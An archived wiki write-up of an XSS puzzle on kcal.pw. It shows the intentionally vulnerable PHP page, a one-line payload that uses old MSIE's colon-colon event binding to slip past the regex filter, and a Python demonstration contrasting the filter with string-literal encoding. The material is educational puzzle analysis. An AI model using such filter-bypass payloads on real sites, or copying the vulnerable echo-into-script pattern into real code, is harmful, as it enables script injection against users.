This repository has been archived by the owner on Jul 4, 2023. It is now read-only.

Puzzle 2 on kcal.pw

cure53 edited this page Sep 17, 2014 · 1 revision

kcal.pw Puzzle 2

XSS Puzzle published by @filedescriptor in August 2014: http://kcal.pw/puzzle2.php

Code

```html
<meta charset="utf-8">
<p>alert(1) in this origin</p>
<p><a href="?xss=XSS">give it a try</a></p>
<script>
if (0) {
    <?php echo preg_replace('/}[\w\W]*{|</', '_', $_GET['xss']); ?>

}
</script>
<!--
<?php readfile(__FILE__); ?>
```

Solution

The solution is based on abusing a feature proposed for ES3 that never made it into the standard but was implemented prematurely in MSIE: the colon-colon operator.

PoC

```js
function self::onload(){alert(1)}
```

What happens here is the following: MSIE allows events to be bound to objects using the colon-colon operator. This construct passes the strict filter regex the challenge is using and thereby introduces event handling inside the if(0) block, even though no statement in that block ever executes. A load event is bound to self, which has the same effect as window.onload.
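To make the filter's blind spot concrete, the following added example (not part of the original wiki page or of the challenge) ports the challenge's preg_replace pattern to Python, runs it over the PoC and over a conventional block-breaking input, and contrasts the denylist with a hypothetical hardened embedding (`embed_as_js_string`, an assumed name) that emits the untrusted value as a JSON string literal with HTML-significant characters escaped, so it can only ever be data inside the script.

```python
import json
import re

# The challenge's filter, ported from preg_replace('/}[\w\W]*{|</', '_', ...).
# It only tries to stop closing the if(0){...} block and opening an HTML tag.
CHALLENGE_FILTER = re.compile(r'}[\w\W]*{|<')


def apply_challenge_filter(value: str) -> str:
    """Return the value exactly as the puzzle page would echo it into the script."""
    return CHALLENGE_FILTER.sub('_', value)


def render_challenge_script(value: str) -> str:
    """Rebuild the inline script body the puzzle emits, for inspection."""
    return "if (0) {\n    %s\n\n}" % apply_challenge_filter(value)


def embed_as_js_string(value: str) -> str:
    """Hypothetical hardened alternative (assumed, not the challenge's code):
    emit the untrusted value as a JSON string literal.  json.dumps with the
    default ensure_ascii=True already escapes quotes, backslashes, control
    characters and U+2028/U+2029; '<', '>' and '&' are escaped additionally so
    the literal can never terminate the surrounding <script> element."""
    literal = json.dumps(value)
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026')):
        literal = literal.replace(ch, esc)
    return literal


if __name__ == "__main__":
    # Constructed inputs: the page's PoC and a conventional block-breaking attempt.
    poc = "function self::onload(){alert(1)}"
    block_break = "} alert(1); if (0) {"
    print("PoC after filter:        ", apply_challenge_filter(poc))
    print("block-break after filter:", apply_challenge_filter(block_break))
    print("PoC as JSON literal:     ", embed_as_js_string(poc))
    print(render_challenge_script(poc))
```

The denylist catches the obvious attempt (`} alert(1); if (0) {` collapses to `_`) but leaves the PoC untouched, because the PoC never closes the block and contains no `<`. The `function object::event(){}` form is a JScript extension of old MSIE; other engines reject it as a syntax error, which is why a regex written with standard ECMAScript in mind never anticipated it. The lesson for defenders is the usual one: untrusted input belongs in script as an encoded data literal (or outside the script entirely, in a data attribute), never as filtered source text.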